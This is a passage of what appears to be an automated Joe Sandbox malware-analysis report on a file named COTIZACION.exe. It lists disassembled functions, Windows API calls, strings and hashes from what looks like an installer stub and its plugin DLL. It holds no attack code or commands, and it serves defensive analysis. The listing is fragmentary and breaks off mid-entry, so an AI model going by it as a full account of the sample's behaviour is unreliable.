                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                                                • Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
                                                                                                • Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                                                • Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000028,?,00000001,00405316), ref: 004054EF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                                                • Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
                                                                                                • Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                                                • Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                                                • Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
                                                                                                • Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                                                • Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,700211C4,-000000A0), ref: 70021302
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocGlobal
                                                                                                • String ID:
                                                                                                • API String ID: 3761449716-0
                                                                                                • Opcode ID: 1fa8008312811d2e097c1057552e11591f2a39d55fd7b351527a2dd34a631a07
                                                                                                • Instruction ID: 1cc576f73056ce86a65e4eb34b2c2cfb32e86ee0fc4ffdd19389ac8c4d345c5a
                                                                                                • Opcode Fuzzy Hash: 1fa8008312811d2e097c1057552e11591f2a39d55fd7b351527a2dd34a631a07
                                                                                                • Instruction Fuzzy Hash: 58B002B26401005FFE409755DD9AF353654F740715F741050F705D5152D57458518959
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00000000,?,0040623C,?,?), ref: 0040631F
                                                                                                • GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
                                                                                                • GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
                                                                                                • wsprintfA.USER32 ref: 00406363
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,00000004,007A4E88,?), ref: 0040639B
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063AB
                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040640D
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00406414
                                                                                                  • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\COTIZACION.exe,80000000,00000003), ref: 004068FD
                                                                                                  • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                • API String ID: 2900126502-461813615
                                                                                                • Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                                                • Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
                                                                                                • Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                                                • Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C
                                                                                                APIs
                                                                                                  • Part of subcall function 700212F8: GlobalAlloc.KERNELBASE(00000040,?,700211C4,-000000A0), ref: 70021302
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 700222F1
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 70022326
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Free$Alloc
                                                                                                • String ID: s<u
                                                                                                • API String ID: 1780285237-779365171
                                                                                                • Opcode ID: 54c028372ca542150d9af4261a1c7bace912ce94e428229afaefccb9d4f8de71
                                                                                                • Instruction ID: 7f96d71bbdeb954ffcd8ab07b465d7aa119dc9fd293af1908d788f95d71b7297
                                                                                                • Opcode Fuzzy Hash: 54c028372ca542150d9af4261a1c7bace912ce94e428229afaefccb9d4f8de71
                                                                                                • Instruction Fuzzy Hash: 4531DE32100101FFE7268FA5ED84F6EB7BAFB45B32B300129F602D6161D7369999DB60
                                                                                                APIs
                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                                • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                                • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                                                Strings
                                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
                                                                                                • *?|<>/":, xrefs: 00406D7F
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                                • API String ID: 589700163-776222514
                                                                                                • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                                                • Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
                                                                                                • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                                                • Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                                                • Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
                                                                                                • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                                                • Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040364B
                                                                                                • MulDiv.KERNEL32(00126870,00000064,00126870), ref: 00403673
                                                                                                • wsprintfW.USER32 ref: 00403683
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00403693
                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 0040367D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                                                • Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
                                                                                                • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                                                • Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 7002116B
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 700211AE
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 700211CD
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 700211E6
                                                                                                • GlobalFree.KERNEL32 ref: 7002125C
                                                                                                • GlobalFree.KERNEL32(?), ref: 700212A7
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 700212BF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Free$Alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1780285237-0
                                                                                                • Opcode ID: c38fe23532219c782df549f43b99878dda0a68fc496c5926a130745c3691ef64
                                                                                                • Instruction ID: 5b1403470f0257959a54df1a4c9ae88cf6cabc081a387e62fd2c3738876a7451
                                                                                                • Opcode Fuzzy Hash: c38fe23532219c782df549f43b99878dda0a68fc496c5926a130745c3691ef64
                                                                                                • Instruction Fuzzy Hash: EA51BA72500201EFD710CF69EC80AAE77E9FB68B22B204569F94AD7361D731E915CB94
                                                                                                APIs
                                                                                                • wsprintfW.USER32 ref: 70021F51
                                                                                                • lstrcpyW.KERNEL32(?,error,00001018,70021765,00000000,?), ref: 70021F71
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpywsprintf
                                                                                                • String ID: callback%d$error$s<u
                                                                                                • API String ID: 2408954437-3671815815
                                                                                                • Opcode ID: 09f60fcdaa538e109d5f7ab750ad9f60791295f8b7e6f2f19593b33027f2557f
                                                                                                • Instruction ID: 135a1b4a07c3cd8661586b2a87fa0aaa5f964c3f1a4a3838a7a84e6bea79c879
                                                                                                • Opcode Fuzzy Hash: 09f60fcdaa538e109d5f7ab750ad9f60791295f8b7e6f2f19593b33027f2557f
                                                                                                • Instruction Fuzzy Hash: 45F08235204110AFD3048B04E988EBE73E6EF85721F1581A8FE5A97311C7B4AC818B91
                                                                                                APIs
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 700221BF
                                                                                                  • Part of subcall function 700212E1: lstrcpynW.KERNEL32(00000000,?,7002156A,?,700211C4,-000000A0), ref: 700212F1
                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 7002212C
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7002214C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                • String ID:
                                                                                                • API String ID: 4216380887-0
                                                                                                • Opcode ID: 3562717f4ccf72c232665ad1fdddb6e26d2cd857cb373532633976aff65fbe33
                                                                                                • Instruction ID: 0e47fa6a3ecd932a8c4dca6a6a71c636e9e70f77f9a0cdd09bb70caca6802b83
                                                                                                • Opcode Fuzzy Hash: 3562717f4ccf72c232665ad1fdddb6e26d2cd857cb373532633976aff65fbe33
                                                                                                • Instruction Fuzzy Hash: 1841F371405205FFC3119FB4EC84FEE77B9FB04B62BA0023DFA499A14AD7706591DAA0
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,70022B4C,00000000,00000808), ref: 70021F8C
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 70021F97
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 70021FAB
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 70021FB6
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 70021FBF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                • String ID:
                                                                                                • API String ID: 1148316912-0
                                                                                                • Opcode ID: 74514619470da0a281b810cb3f0625f6863a617b60f8bf6ab2b6db3637eb93a2
                                                                                                • Instruction ID: a9ccd60bc8da06d12fa9bee9aecf5722f79b79c07a23df437a98741ec2b70a29
                                                                                                • Opcode Fuzzy Hash: 74514619470da0a281b810cb3f0625f6863a617b60f8bf6ab2b6db3637eb93a2
                                                                                                • Instruction Fuzzy Hash: B0F0AC33108118BFD6101BA7DC4CE57BE6CEB8B6FAB260255FB19D11A1C5B268818771
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CA1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 0040653A
                                                                                                • CharPrevW.USER32(?,00000000), ref: 00406545
